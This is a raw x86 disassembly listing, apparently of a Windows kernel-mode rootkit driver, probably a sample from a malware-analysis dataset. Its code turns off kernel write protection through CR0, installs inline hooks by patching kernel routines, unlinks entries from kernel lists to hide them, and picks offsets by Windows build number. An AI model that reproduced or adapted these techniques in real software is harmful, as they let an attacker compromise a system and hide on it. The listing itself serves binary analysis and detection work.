sub_10480
add [ eax ] al
add [ eax ] al
add [ eax ] al
mov edi edi
push ebp
mov ebp esp
mov ecx [ ebp + 0xc ]
and [ ecx + 0x18 ] 0x0
and [ ecx + 0x1c ] 0x0
xor dl dl
call [ 0x12090 ]
xor eax eax
pop ebp
retn 0x8
sub_104aa
mov edi edi
push ebp
mov ebp esp
mov ecx [ ebp + 0xc ]
mov eax [ ecx + 0x60 ]
cmp [ eax + 0xc ] 0x8000c004
je 0x104c9
push esi
mov esi [ ecx + 0x18 ]
xor dl dl
call [ 0x12090 ]
mov eax esi
pop esi
pop ebp
retn 0x8
and [ ecx + 0x1c ] 0x0
mov [ ecx + 0x18 ] 0xc0000010
sub_104e2
mov eax [ 0x12a68 ]
push esi
mov esi [ eax + 0x4 ]
call 0x10a2c
call 0x10b54
call 0x11d20
jmp 0x10508
test esi esi
jne 0x104fc
mov eax esi
mov esi [ esi + 0xc ]
push eax
call [ 0x12088 ]
pop esi
retn 0x4
sub_10516
mov edi edi
push ebp
mov ebp esp
push ecx
and [ ebp - 0x4 ] 0x0
push esi
mov esi [ ebp + 0x8 ]
lea eax [ ebp - 0x4 ]
push eax
push 0x0
push 0x100
push 0x22
push 0x12180
push 0x0
push esi
mov [ 0x12a68 ] esi
call [ 0x1204c ]
test eax eax
jl 0x10596
pop esi
leave
retn 0x8
call 0x1121c
push esi
call 0x1088e
call 0x119aa
test al al
jne 0x10564
call 0x11cdc
call 0x10c48
test al al
je 0x1055d
mov eax 0xc0000001
jmp 0x10596
call 0x10ce8
test al al
je 0x1055d
mov eax 0x10486
mov [ esi + 0x40 ] eax
mov [ esi + 0x38 ] eax
mov [ esi + 0x70 ] 0x104aa
mov [ esi + 0x34 ] 0x104e2
xor eax eax
sub_105a0
mov edi edi
push ebp
mov ebp esp
mov ecx [ ebp + 0x8 ]
push ebx
xor ebx ebx
xor al al
cmp ecx ebx
je 0x10605
pop ebx
pop ebp
retn 0x4
push esi
mov esi [ ecx + 0x14 ]
cmp esi ebx
je 0x10604
pop esi
mov ecx [ esi + 0x4 ]
mov edx [ esi ]
cmp ecx ebx
je 0x10604
cmp edx ebx
je 0x10604
mov [ ecx ] edx
mov [ edx + 0x4 ] ecx
movzx eax [ esi + 0x24 ]
push eax
push ebx
push [ esi + 0x28 ]
call 0x11f40
movzx eax [ esi + 0x2c ]
push eax
push ebx
push [ esi + 0x30 ]
call 0x11f40
add esp 0x18
xor eax eax
mov [ esi + 0x2c ] ax
mov [ esi + 0x24 ] ax
mov [ esi + 0x1c ] ebx
mov [ esi + 0x18 ] ebx
mov [ esi + 0x44 ] ebx
mov [ esi ] ebx
mov [ esi + 0x4 ] ebx
mov al 0x1
sub_10610
mov edi edi
push ebp
mov ebp esp
push edi
mov edi [ ebp + 0xc ]
xor eax eax
mov [ edi ] eax
mov ecx [ 0x12a90 ]
cmp ecx eax
je 0x1064f
pop edi
pop ebp
retn 0x8
mov edx [ ebp + 0x8 ]
cmp edx eax
je 0x1064f
mov ecx [ ecx ]
add ecx [ 0x12a6c ]
je 0x1064f
push esi
mov esi [ ecx + 0x4 ]
cmp esi [ ecx ]
je 0x1064e
pop esi
sub edx esi
lea ecx [ edx - 0x1 ]
mov al 0x1
cmp ecx 0x3e
ja 0x1064e
mov [ edi ] edx
sub_1065a
mov edi edi
push ebp
mov ebp esp
xor eax eax
cmp [ ebp + 0x8 ] eax
je 0x10698
pop ebp
retn 0x8
mov edx [ ebp + 0xc ]
cmp edx eax
je 0x10698
mov ecx [ edx + 0x4 ]
cmp ecx edx
je 0x10698
push esi
mov edx [ ecx + 0x4 ]
mov ecx [ ecx ]
mov [ edx ] ecx
mov al 0x1
mov [ ecx + 0x4 ] edx
mov ecx [ ecx + 0x4 ]
cmp ecx edx
jne 0x10675
mov esi [ 0x12a70 ]
add esi ecx
cmp esi [ ebp + 0x8 ]
je 0x1068b
jmp 0x10697
pop esi
sub_106a2
mov edi edi
push ebp
mov ebp esp
sub esp 0x28
xor eax eax
mov [ ebp - 0x10 ] ax
push ebx
push edi
lea edi [ ebp - 0xe ]
stosd [ edi ]
stosw [ edi ]
xor ebx ebx
xor eax eax
mov [ ebp - 0x28 ] ebx
lea edi [ ebp - 0x24 ]
stosd [ edi ]
stosd [ edi ]
stosd [ edi ]
stosd [ edi ]
stosd [ edi ]
mov edi [ ebp + 0x10 ]
mov [ ebp - 0x8 ] ebx
mov [ ebp - 0x4 ] ebx
cmp edi ebx
je 0x10769
mov ecx [ ebp - 0x4 ]
call [ 0x12014 ]
push [ ebp - 0x8 ]
call [ 0x12010 ]
pop edi
mov al bl
pop ebx
leave
retn 0xc
cmp [ ebp + 0x8 ] ebx
je 0x10769
push [ ebp + 0x8 ]
lea eax [ ebp - 0x10 ]
push eax
call [ 0x12020 ]
lea eax [ ebp - 0x10 ]
mov [ ebp - 0x20 ] eax
lea eax [ ebp - 0x28 ]
push eax
push 0x1
lea eax [ ebp - 0x8 ]
push eax
mov [ ebp - 0x28 ] 0x18
mov [ ebp - 0x24 ] ebx
mov [ ebp - 0x1c ] 0x240
mov [ ebp - 0x18 ] ebx
mov [ ebp - 0x14 ] ebx
call [ 0x1201c ]
test eax eax
jl 0x10769
push ebx
lea eax [ ebp - 0x4 ]
push eax
push ebx
push ebx
push 0x1
push [ ebp - 0x8 ]
call [ 0x12018 ]
test eax eax
jl 0x10769
mov eax [ ebp + 0xc ]
mov ecx [ ebp - 0x4 ]
lea ecx [ ecx + eax * 4 ]
push esi
mov esi [ ecx ]
mov edx esi
mov eax edx
cmp edx ebx
je 0x10766
mov bl 0x1
pop esi
cmp edi [ eax + 0x4 ]
je 0x10756
cmp eax ebx
je 0x10766
mov edx eax
mov eax [ eax ]
cmp eax ebx
jne 0x10749
cmp eax esi
mov eax [ eax ]
jne 0x10764
mov [ edx ] eax
mov [ ecx ] eax
jmp 0x10766
sub_10788
mov edi edi
push ebp
mov ebp esp
push ecx
push ecx
push ebx
push esi
mov esi [ ebp + 0x8 ]
xor ebx ebx
cmp esi ebx
je 0x1087e
mov al [ 0x12a76 ]
pop esi
pop ebx
leave
retn 0x4
cmp [ 0x12a76 ] bl
jne 0x1087e
push edi
push [ esi + 0xc ]
mov [ ebp - 0x4 ] ebx
mov [ ebp - 0x8 ] ebx
call 0x10f5c
mov edi eax
cmp edi ebx
je 0x107d9
lea eax [ ebp - 0x4 ]
push eax
push [ esi + 0xc ]
call 0x10f2e
mov [ ebp + 0xb ] al
movzx eax [ esi + 0x1c ]
push eax
push ebx
push [ esi + 0x20 ]
call 0x11f40
mov eax [ esi + 0x18 ]
movzx ecx [ eax + 0xc ]
push ecx
push ebx
push [ eax + 0x10 ]
call 0x11f40
mov eax [ esi + 0x24 ]
movzx ecx [ eax ]
push ecx
push ebx
push [ eax + 0x4 ]
call 0x11f40
add esp 0x24
cli
mov eax cr0
and eax 0xfffeffff
mov cr0 eax
cmp [ ebp - 0x8 ] ebx
jbe 0x1083b
cmp [ edi ] 0x53445352
jne 0x107d9
pop edi
cmp [ ebp + 0xb ] bl
je 0x10850
push [ ebp - 0x8 ]
add edi 0x18
push ebx
push edi
call 0x11f40
add esp 0xc
lea eax [ edi + 0x18 ]
lea edx [ eax + 0x1 ]
mov eax cr0
or eax 0x10000
mov cr0 eax
sti
mov eax [ esi + 0x4 ]
mov [ esi + 0xc ] ebx
mov [ esi + 0x10 ] ebx
xor ecx ecx
mov [ eax ] cx
mov eax [ esi + 0x4 ]
mov [ eax + 0x2 ] cx
mov eax [ esi + 0x4 ]
mov [ eax + 0x2c ] ebx
mov [ 0x12a76 ] 0x1
push [ ebp - 0x4 ]
push ebx
push [ esi + 0xc ]
call 0x11f40
add esp 0xc
mov cl [ eax ]
inc eax
cmp cl bl
jne 0x107cd
sub eax edx
mov [ ebp - 0x8 ] eax
sub_1088e
mov edi edi
push ebp
mov ebp esp
push ecx
push ecx
cmp [ 0x12a74 ] 0x0
je 0x108a5
push esi
mov esi [ ebp + 0x8 ]
test esi esi
jne 0x108b4
mov al 0x1
jmp 0x10963
mov eax [ 0x12024 ]
movzx eax [ eax ]
mov [ 0x12a74 ] 0x1
cmp eax 0x893
je 0x108ff
xor al al
jmp 0x10962
leave
retn 0x4
mov [ 0x12a6c ] 0x38
cmp eax 0xa28
je 0x108ff
pop esi
push 0x12a70
push esi
call 0x10610
mov [ 0x12a75 ] al
test al al
je 0x1095d
lea eax [ ebp - 0x8 ]
push eax
call 0x10df6
mov [ 0x12a78 ] eax
cmp eax 0xece
je 0x108ff
mov al [ 0x12a74 ]
cmp [ 0x12a70 ] 0x1
jae 0x1095d
cmp eax 0x176f
jbe 0x108f6
mov [ 0x12a70 ] 0x28
mov [ 0x12a74 ] 0x0
jmp 0x10909
cmp eax 0x1772
jbe 0x108ed
push edi
xor eax eax
mov [ ebp - 0x8 ] ax
lea edi [ ebp - 0x6 ]
stosd [ edi ]
stosw [ edi ]
lea eax [ ebp - 0x8 ]
push eax
lea eax [ esi + 0x1c ]
push eax
call 0x10e72
pop edi
test al al
je 0x10936
and [ 0x12a6c ] 0x0
jmp 0x10909
cmp eax 0x1db0
jne 0x108f6
sub_1096c
mov edi edi
push ebp
mov ebp esp
push ebx
push edi
mov edi [ ebp + 0x8 ]
xor bl bl
test edi edi
je 0x109d2
pop edi
mov al bl
pop ebx
pop ebp
retn 0x4
cmp [ 0x12a90 ] 0x0
je 0x109d2
cmp [ 0x12028 ] 0x0
je 0x109d2
push edi
call 0x1088e
test al al
je 0x109d2
cmp [ 0x12a75 ] bl
je 0x109d2
mov eax [ 0x12a90 ]
mov eax [ eax ]
push esi
mov esi [ 0x12a6c ]
add eax esi
push eax
push edi
call 0x1065a
mov bl al
test bl bl
je 0x109d1
pop esi
mov eax [ 0x12028 ]
mov eax [ eax ]
add eax esi
push eax
push [ edi + 0x4 ]
call 0x1065a
mov bl al
sub_109e0
mov edi edi
push ebp
mov ebp esp
push esi
mov esi [ ebp + 0x8 ]
xor al al
test esi esi
je 0x10a22
pop esi
pop ebp
retn 0x4
mov ecx [ 0x12a78 ]
cmp ecx 0xffffffff
je 0x10a22
cmp ecx 0x25
jae 0x10a22
push esi
push ecx
push 0x11f6e
call 0x106a2
test al al
je 0x10a22
push [ esi + 0x4 ]
push [ 0x12a78 ]
push 0x11f5e
call 0x106a2
sub_10a2c
mov edi edi
push ebp
mov ebp esp
sub esp 0x10
mov eax [ 0x12a60 ]
xor eax ebp
mov [ ebp - 0x4 ] eax
mov eax [ 0x12a7c ]
cmp eax 0x1
jae 0x10a4c
and [ ebp - 0x10 ] 0x0
mov edx [ 0x1202c ]
push esi
xor esi esi
mov al 0x1
jmp 0x10abc
inc esi
cmp esi 0x37
jl 0x10a59
cmp [ edx + esi - 0x5 ] 0xe8
je 0x10a73
mov ecx [ ebp - 0x4 ]
xor ecx ebp
call 0x11eff
leave
retn
lea ecx [ edx + esi ]
cmp [ ecx ] 0x28c25d
jne 0x10a6b
jmp 0x10ab9
lea esi [ ecx - 0x4 ]
mov edx [ esi ]
cmp edx 0x1
jb 0x10ab9
xor al al
pop esi
push edi
sub eax ecx
mov [ ebp - 0x10 ] eax
push 0x4
lea eax [ ebp - 0x10 ]
push eax
push esi
lea edi [ ecx + edx ]
call 0x11030
test eax eax
jl 0x10ab8
pop edi
push 0x6
lea eax [ ebp - 0xc ]
push eax
push edi
mov [ ebp - 0xc ] 0xcccccccc
mov [ ebp - 0x8 ] 0xcc
mov [ ebp - 0x7 ] 0xcc
call 0x11030
and [ 0x12a7c ] 0x0
sub_10ace
mov edi edi
push ebp
mov ebp esp
push ecx
mov eax [ 0x12a7c ]
mov [ ebp - 0x4 ] 0xc0000001
cmp eax 0x1
jb 0x10b48
mov eax [ ebp - 0x4 ]
leave
retn 0x2c
push ebx
mov ebx [ ebp + 0x1c ]
push esi
mov esi [ ebp + 0x24 ]
push edi
push [ ebp + 0x30 ]
mov edi [ ebp + 0x20 ]
push [ ebp + 0x2c ]
push [ ebp + 0x28 ]
push esi
push edi
push ebx
push [ ebp + 0x18 ]
push [ ebp + 0x14 ]
push [ ebp + 0x10 ]
push [ ebp + 0xc ]
push [ ebp + 0x8 ]
call eax
mov [ ebp - 0x4 ] eax
test eax eax
jne 0x10b45
pop edi
pop esi
pop ebx
mov eax [ 0x12024 ]
movzx eax [ eax ]
push esi
push edi
push ebx
cmp eax 0x1770
jae 0x10b2e
call 0x11702
call 0x116a6
jmp 0x10b33
push [ ebp + 0x18 ]
push ebx
push [ ebp + 0x28 ]
push esi
push edi
call 0x11324
test al al
je 0x10b45
sub_10b54
mov edi edi
push ebp
mov ebp esp
sub esp 0x10
mov eax [ 0x12a60 ]
xor eax ebp
mov [ ebp - 0x4 ] eax
xor eax eax
inc eax
cmp [ 0x12a80 ] eax
jb 0x10bc6
mov ecx [ ebp - 0x4 ]
xor ecx ebp
call 0x11eff
leave
retn
mov eax [ 0x12a88 ]
mov [ ebp - 0x10 ] eax
push 0x4
lea eax [ ebp - 0x10 ]
push eax
push [ 0x12a84 ]
call 0x11030
test eax eax
jl 0x10bc4
xor al al
push 0x6
lea eax [ ebp - 0xc ]
push eax
push [ 0x12a8c ]
mov [ ebp - 0xc ] 0xcccccccc
mov [ ebp - 0x8 ] 0xcc
mov [ ebp - 0x7 ] 0xcc
call 0x11030
xor eax eax
mov [ 0x12a80 ] eax
mov [ 0x12a8c ] eax
mov [ 0x12a84 ] eax
mov [ 0x12a88 ] eax
sub_10bd8
mov edi edi
push ebp
mov ebp esp
mov ecx [ 0x12a80 ]
mov eax 0xc0000001
cmp ecx 0x1
jb 0x10c04
pop ebp
retn 0x14
cmp [ ebp + 0x8 ] 0xfffffffe
jne 0x10c08
pop ebp
jmp ecx
cmp [ ebp + 0xc ] 0x0
jne 0x10c08
push [ ebp + 0x14 ]
push [ ebp + 0x10 ]
call 0x1128c
sub_10c10
mov edi edi
push ebp
mov ebp esp
mov ecx [ 0x12a80 ]
mov eax 0xc0000001
cmp ecx 0x1
jb 0x10c3c
pop ebp
retn 0x10
cmp [ ebp + 0x8 ] 0xfffffffe
jne 0x10c40
pop ebp
jmp ecx
cmp [ ebp + 0xc ] 0x0
jne 0x10c40
push [ ebp + 0x14 ]
push [ ebp + 0x10 ]
call 0x1128c
sub_10c48
mov edi edi
push ebp
mov ebp esp
sub esp 0xc
xor ecx ecx
mov [ ebp - 0x1 ] 0x0
cmp [ 0x12a7c ] ecx
jbe 0x10c64
mov eax [ 0x1202c ]
mov [ ebp - 0x8 ] ecx
mov [ ebp - 0xc ] eax
push esi
mov [ ebp - 0x1 ] 0x1
jmp 0x10cde
inc ecx
cmp ecx 0x37
jl 0x10c70
cmp [ eax + ecx - 0x5 ] 0xe8
je 0x10c8a
mov al [ ebp - 0x1 ]
leave
retn
lea esi [ eax + ecx ]
cmp [ esi ] 0x28c25d
jne 0x10c82
jmp 0x10cdd
push ebx
lea ebx [ esi - 0x4 ]
mov eax [ ebx ]
mov [ ebp - 0x8 ] eax
cmp eax 0x1
jb 0x10cdc
pop esi
pop ebx
push edi
lea edi [ esi + eax ]
lea eax [ ebp - 0xc ]
push eax
push [ 0x12030 ]
push 0x10ace
call 0x1111a
mov [ ebp - 0x1 ] al
test al al
je 0x10cdb
pop edi
mov eax [ ebp - 0xc ]
sub eax esi
mov [ ebp - 0x8 ] eax
push 0x4
lea eax [ ebp - 0x8 ]
push eax
push ebx
call 0x11030
test eax eax
jge 0x10cd5
mov [ 0x12a7c ] edi
mov [ ebp - 0x1 ] 0x0
jmp 0x10cdb
sub_10ce8
mov edi edi
push ebp
mov ebp esp
sub esp 0xc
xor ecx ecx
mov [ ebp - 0x1 ] 0x0
cmp [ 0x12a80 ] ecx
jbe 0x10d07
mov eax [ 0x12038 ]
mov edx [ 0x12024 ]
mov [ ebp - 0x8 ] ecx
mov [ ebp - 0xc ] eax
movzx edx [ edx ]
push ebx
push esi
push edi
cmp edx 0x1770
jae 0x10d6c
mov [ ebp - 0x1 ] 0x1
jmp 0x10deb
push 0xe95dec8b
push ecx
push 0x10
push eax
call 0x10fe4
mov [ ebp - 0x8 ] eax
cmp eax 0xffffffff
je 0x10de8
push 0x10c25d
push ecx
push 0x37
push eax
call 0x10fe4
mov [ ebp - 0x8 ] eax
cmp eax 0xffffffff
je 0x10de8
mov al [ ebp - 0x1 ]
leave
retn
pop edi
pop esi
pop ebx
mov ecx [ ebp - 0xc ]
lea esi [ ecx + eax + 0x8 ]
lea edi [ esi - 0x4 ]
mov eax [ edi ]
mov [ ebp - 0x8 ] eax
lea ebx [ esi + eax ]
lea eax [ ebp - 0xc ]
push eax
push [ 0x12034 ]
push 0x10c10
mov ecx [ ebp - 0xc ]
lea esi [ ecx + eax ]
cmp [ esi - 0x5 ] 0xe8
jne 0x10de8
mov eax [ ebp - 0xc ]
sub eax esi
mov [ ebp - 0x8 ] eax
mov eax [ edi ]
mov [ 0x12a88 ] eax
push 0x4
lea eax [ ebp - 0x8 ]
push eax
push edi
call 0x11030
test eax eax
jge 0x10dd4
lea edi [ esi - 0x4 ]
mov eax [ edi ]
mov [ ebp - 0x8 ] eax
lea ebx [ esi + eax ]
lea eax [ ebp - 0xc ]
push eax
push [ 0x12034 ]
push 0x10bd8
jmp 0x10da3
mov eax [ ebp - 0xc ]
mov [ 0x12a84 ] edi
mov [ 0x12a8c ] eax
mov [ 0x12a80 ] ebx
mov [ ebp - 0x1 ] 0x0
jmp 0x10de8
call 0x1111a
mov [ ebp - 0x1 ] al
test al al
je 0x10de8
sub_10df6
mov edi edi
push ebp
mov ebp esp
push edi
mov edi [ ebp + 0x8 ]
test edi edi
jne 0x10e08
mov ax [ edi ]
mov ecx 0xfffe
push ebx
and ax cx
push esi
xor ecx ecx
xor esi esi
xor ebx ebx
cmp cx ax
jae 0x10e5b
or eax 0xffffffff
jmp 0x10e68
push 0x25
pop ecx
mov eax esi
xor edx edx
div ecx
pop esi
pop ebx
mov eax edx
mov ecx [ edi + 0x4 ]
movzx eax bx
movzx eax [ ecx + eax * 2 ]
mov ecx esi
imul esi esi 0x3
shr ecx 0x1
add esi ecx
cmp eax 0x61
jb 0x10e47
pop edi
pop ebp
retn 0x4
add esi eax
jmp 0x10e4f
cmp eax 0x7a
jbe 0x10e4b
mov ax [ edi ]
inc ebx
shr ax 0x1
cmp bx ax
jb 0x10e20
lea esi [ esi + eax - 0x20 ]
push eax
call [ 0x1203c ]
movzx eax ax
sub_10e72
mov edi edi
push ebp
mov ebp esp
push edi
mov edi [ ebp + 0x8 ]
xor eax eax
cmp edi eax
je 0x10ee5
pop edi
pop ebp
retn 0x8
mov ecx [ ebp + 0xc ]
cmp ecx eax
je 0x10ee5
xor edx edx
push esi
mov [ ecx + 0x4 ] eax
mov [ ecx + 0x2 ] dx
mov [ ecx ] dx
mov esi [ edi + 0x4 ]
cmp esi eax
je 0x10ee4
pop esi
movzx edx [ edi ]
cmp dx 0x2
jb 0x10ee4
shr dx 0x1
dec dx
push ebx
movzx edx dx
jmp 0x10ec0
cmp dx ax
ja 0x10eb0
movzx ebx dx
cmp [ esi + ebx * 2 ] 0x5c
je 0x10ec7
jmp 0x10ec8
inc edx
add edx 0xffff
movzx ebx dx
lea esi [ esi + ebx * 2 ]
mov [ ecx + 0x4 ] esi
lea esi [ edx + edx ]
mov dx [ edi ]
sub dx si
mov al 0x1
mov [ ecx + 0x2 ] dx
mov [ ecx ] dx
pop ebx
sub_10ef0
mov edi edi
push ebp
mov ebp esp
push esi
push edi
mov edi [ ebp + 0x8 ]
push edi
xor esi esi
call [ 0x12040 ]
test al al
je 0x10f20
pop edi
mov eax esi
pop esi
pop ebp
retn 0x4
mov eax 0x5a4d
cmp ax [ edi ]
jne 0x10f20
mov esi [ edi + 0x3c ]
add esi edi
cmp [ esi ] 0x4550
je 0x10f20
xor esi esi
sub_10f2e
mov edi edi
push ebp
mov ebp esp
push esi
mov esi [ ebp + 0xc ]
push [ ebp + 0x8 ]
and [ esi ] 0x0
call 0x10ef0
test eax eax
jne 0x10f4a
mov eax [ eax + 0x54 ]
mov [ esi ] eax
mov al 0x1
xor al al
jmp 0x10f51
pop esi
pop ebp
retn 0x8
sub_10f5c
mov edi edi
push ebp
mov ebp esp
push ecx
and [ ebp - 0x4 ] 0x0
push edi
mov edi [ ebp + 0x8 ]
push edi
call 0x10ef0
test eax eax
je 0x10fd6
mov eax [ ebp - 0x4 ]
pop edi
leave
retn 0x4
push esi
lea esi [ eax + 0xa8 ]
cmp [ esi + 0x4 ] 0x1
jb 0x10fd5
pop esi
mov eax [ esi ]
test eax eax
je 0x10fd5
push ebx
mov ebx [ 0x12040 ]
add edi eax
push edi
call ebx
test al al
je 0x10fd4
pop ebx
mov eax [ esi + 0x4 ]
push 0x1c
xor edx edx
pop esi
div esi
xor ecx ecx
test eax eax
jbe 0x10fd4
cmp [ edi + 0xc ] 0x2
je 0x10fb5
cmp ecx eax
jae 0x10fd4
inc ecx
add edi 0x1c
cmp ecx eax
jb 0x10fa7
mov edi [ edi + 0x14 ]
cmp edi 0x1
jb 0x10fd4
mov eax [ ebp + 0x8 ]
add edi eax
push edi
mov [ ebp - 0x4 ] edi
call ebx
test al al
jne 0x10fd4
and [ ebp - 0x4 ] 0x0
sub_10fe4
mov edi edi
push ebp
mov ebp esp
mov edx [ ebp + 0xc ]
or eax 0xffffffff
cmp edx 0x4
jb 0x11023
or eax 0xffffffff
mov ecx [ ebp + 0x10 ]
cmp ecx edx
jae 0x11023
add edx 0xfffffffc
push edi
or eax 0xffffffff
mov edi [ ebp + 0x8 ]
add edi eax
mov edi [ edi + ecx ]
cmp edi [ ebp + 0x14 ]
jne 0x10fff
pop ebp
retn 0x10
add eax ecx
jmp 0x11026
inc eax
lea edi [ eax + ecx ]
cmp edi edx
ja 0x11016
jmp 0x11019
pop edi
cmp eax 0xffffffff
je 0x11026
sub_11030
mov edi edi
push ebp
mov ebp esp
push ecx
push ecx
push ebx
push esi
push [ ebp + 0x8 ]
mov esi 0xc0000001
mov [ ebp - 0x8 ] esi
call [ 0x12040 ]
test al al
je 0x1110d
mov eax esi
xor ebx ebx
cmp [ ebp + 0xc ] ebx
je 0x1110d
cmp [ ebp + 0x10 ] ebx
je 0x1110d
push ebx
push ebx
push ebx
push [ ebp + 0x10 ]
push [ ebp + 0x8 ]
call [ 0x12060 ]
mov esi eax
cmp esi ebx
je 0x11108
mov eax [ ebp - 0x8 ]
jmp 0x1110f
push edi
push esi
call [ 0x1205c ]
mov edi [ 0x12058 ]
or [ esi + 0x6 ] 0x1
push 0x10
push ebx
push ebx
push 0x2
push ebx
push esi
call edi
mov [ ebp - 0x4 ] eax
cmp eax ebx
jne 0x110c4
pop esi
pop ebx
leave
retn 0xc
call [ 0x12004 ]
mov ecx [ ebp + 0x10 ]
mov [ ebp + 0xb ] al
cmp ecx ebx
jbe 0x110e5
push 0x10
push ebx
push ebx
push 0x1
push ebx
push esi
call edi
mov [ ebp - 0x4 ] eax
cmp eax ebx
jne 0x110c4
mov cl [ ebp + 0xb ]
call [ 0x12000 ]
and [ esi + 0x6 ] 0xfffe
push esi
push [ ebp - 0x4 ]
call [ 0x12054 ]
mov [ ebp - 0x8 ] ebx
mov edx [ ebp - 0x4 ]
mov edi [ ebp + 0xc ]
sub edi edx
push 0x10
push ebx
push ebx
push ebx
push ebx
push esi
call edi
mov [ ebp - 0x4 ] eax
cmp eax ebx
je 0x11100
mov al [ edi + edx ]
mov [ edx ] al
inc edx
dec ecx
jne 0x110dc
push esi
call [ 0x12050 ]
pop edi
sub_1111a
mov edi edi
push ebp
mov ebp esp
sub esp 0x14
mov eax [ 0x12a60 ]
xor eax ebp
mov [ ebp - 0x4 ] eax
mov eax [ ebp + 0x10 ]
and [ eax ] 0x0
cmp [ ebp + 0x8 ] 0x0
push ebx
push esi
mov esi [ ebp + 0xc ]
mov [ ebp - 0x14 ] eax
mov [ ebp - 0xd ] 0x0
mov ebx esi
je 0x11203
mov ecx [ ebp - 0x4 ]
mov al [ ebp - 0xd ]
pop esi
xor ecx ebp
pop ebx
call 0x11eff
leave
retn 0xc
test esi esi
je 0x11203
push edi
mov edi [ 0x12040 ]
push esi
call edi
test al al
je 0x11202
pop edi
add esi 0x1000
push esi
call edi
test al al
je 0x11202
mov [ ebp - 0xe ] 0x0
mov esi 0x1000
lea eax [ ecx + 0x8 ]
cmp eax esi
ja 0x111c9
add ebx 0xfffff000
push ebx
call edi
test al al
je 0x11202
or ecx 0xffffffff
movzx eax [ ecx + ebx + 0x4 ]
cmp eax 0xcccc
je 0x111cc
cmp [ ebp - 0xe ] 0x0
jne 0x11202
xor eax eax
lea edi [ ebp - 0xb ]
stosd [ edi ]
stosb [ edi ]
mov eax [ ebp + 0x8 ]
mov [ ebp - 0xb ] eax
push 0x6
lea eax [ ebp - 0xc ]
lea esi [ ecx + ebx ]
push eax
push esi
mov [ ebp - 0xc ] 0x68
mov [ ebp - 0x7 ] 0xc3
call 0x11030
test eax eax
jl 0x11202
cmp ecx 0xffffffff
je 0x11202
lea eax [ ecx + 0x4 ]
cmp eax esi
jb 0x11180
mov [ ebp - 0xe ] 0x1
jmp 0x1117e
mov eax [ ebp - 0x14 ]
mov [ eax ] esi
mov [ ebp - 0xd ] 0x1
push 0xcccccccc
push eax
push esi
push ebx
call 0x10fe4
mov ecx eax
cmp ecx 0xffffffff
jne 0x111ad
jmp 0x11202
xor eax eax
sub_1121c
mov edi edi
push ebp
mov ebp esp
push ecx
push ecx
push edi
xor eax eax
mov [ ebp - 0x8 ] ax
lea edi [ ebp - 0x6 ]
stosd [ edi ]
stosw [ edi ]
push 0x11f7e
lea eax [ ebp - 0x8 ]
push eax
call [ 0x12020 ]
lea eax [ ebp - 0x8 ]
push eax
call [ 0x12064 ]
test eax eax
mov [ 0x12a90 ] eax
setne al
pop edi
leave
retn
sub_1125c
mov edi edi
push ebp
mov ebp esp
mov ecx [ ebp + 0x8 ]
xor eax eax
cmp ecx eax
je 0x11282
pop ebp
retn 0x8
cmp [ ebp + 0xc ] 0xb
jb 0x11282
push ecx
cmp [ ecx + 0x4 ] al
je 0x1127d
call 0x11e34
call 0x11d48
jmp 0x11282
sub_1128c
mov edi edi
push ebp
mov ebp esp
mov eax [ ebp + 0x8 ]
push esi
mov esi 0xc0000001
test eax eax
je 0x11317
mov eax esi
pop esi
pop ebp
retn 0x8
mov edx [ ebp + 0xc ]
cmp edx 0x8
jb 0x11317
mov ecx [ eax + 0x4 ]
push edi
lea edi [ ecx + 0x9 ]
inc edx
cmp edi edx
pop edi
ja 0x11317
mov edx [ eax ]
cmp edx 0x1000
je 0x11307
push ecx
add eax 0x8
push eax
call 0x1178e
cmp edx 0x2000
je 0x112d9
xor esi esi
push [ 0x12a68 ]
call 0x105a0
push [ 0x12a68 ]
call 0x1096c
push [ 0x12a68 ]
call 0x109e0
push [ 0x12a68 ]
call 0x10788
jmp 0x11311
cmp edx 0x4000
jne 0x11317
test al al
je 0x11317
push ecx
add eax 0x8
push eax
call 0x1125c
jmp 0x11311
sub_11324
mov edi edi
push ebp
mov ebp esp
sub esp 0x138
mov eax [ 0x12a60 ]
xor eax ebp
mov [ ebp - 0x4 ] eax
mov edx [ ebp + 0x18 ]
push ebx
mov ebx [ ebp + 0x10 ]
push esi
xor esi esi
mov [ ebp - 0x68 ] edx
cmp ebx esi
je 0x11690
mov ecx [ ebp - 0x4 ]
pop esi
xor ecx ebp
pop ebx
call 0x11eff
leave
retn 0x14
cmp [ ebp + 0xc ] 0x1
jb 0x11690
cmp edx esi
je 0x11690
mov eax [ 0x12aa0 ]
mov ecx [ 0x12aa4 ]
mov [ ebp - 0x6c ] eax
mov [ ebp - 0x64 ] ecx
cmp eax 0x1
jb 0x11690
cmp ecx 0x1
jb 0x11690
cmp [ ebp + 0x14 ] 0x120003
mov edx [ edx + 0x4 ]
push edi
mov [ ebp - 0x60 ] edx
jne 0x1157c
cmp [ ebp + 0x14 ] 0x12001b
jne 0x1168f
cmp [ ebp + 0xc ] 0x14
jb 0x1168f
pop edi
cmp edx 0x3c
jne 0x1168f
cmp edx 0x14
jb 0x1168f
mov edi [ ebx + 0x18 ]
mov edx [ ebx + 0x30 ]
xor eax eax
mov [ ebp - 0x54 ] ax
mov [ ebp - 0x10 ] al
mov eax [ ebx + 0x28 ]
mov [ ebp - 0x90 ] esi
mov [ ebp - 0x68 ] edi
mov [ ebp - 0x5c ] esi
cmp [ ebx + 0x38 ] esi
jbe 0x1168f
mov eax [ ebp + 0x8 ]
mov eax [ eax + 0x10 ]
sub eax 0x101
je 0x114f4
movzx esi cl
shr ecx 0x8
shl esi 0x8
and ecx 0xff
add esi ecx
mov [ ebp - 0x70 ] esi
mov [ ebp - 0x60 ] edx
mov [ ebp - 0x58 ] eax
mov [ ebp - 0x64 ] edi
mov eax edx
push 0x14
xor edx edx
pop edi
div edi
mov [ ebp - 0x58 ] esi
cmp eax esi
jbe 0x1156e
dec eax
je 0x11470
inc [ ebp - 0x5c ]
mov edi [ ebp - 0x64 ]
mov ecx [ ebp - 0x5c ]
add [ ebp - 0x58 ] 0xc
add [ ebp - 0x60 ] 0x20
add edi 0x38
mov [ ebp - 0x64 ] edi
cmp ecx [ ebx + 0x38 ]
jb 0x115d6
mov ecx [ edi + 0x20 ]
cmp ecx [ ebp - 0x6c ]
jne 0x1166f
mov eax [ ebp - 0x60 ]
mov ecx [ ebp - 0x68 ]
mov [ ecx + 0x4 ] eax
jmp 0x1168f
mov edi ebx
mov [ ebp - 0x5c ] ebx
mov eax edx
push 0x18
xor edx edx
pop edi
div edi
mov [ ebp - 0x58 ] esi
cmp eax esi
jbe 0x1156e
sub eax 0xe
jne 0x1156e
movzx ecx [ edi + 0x1e ]
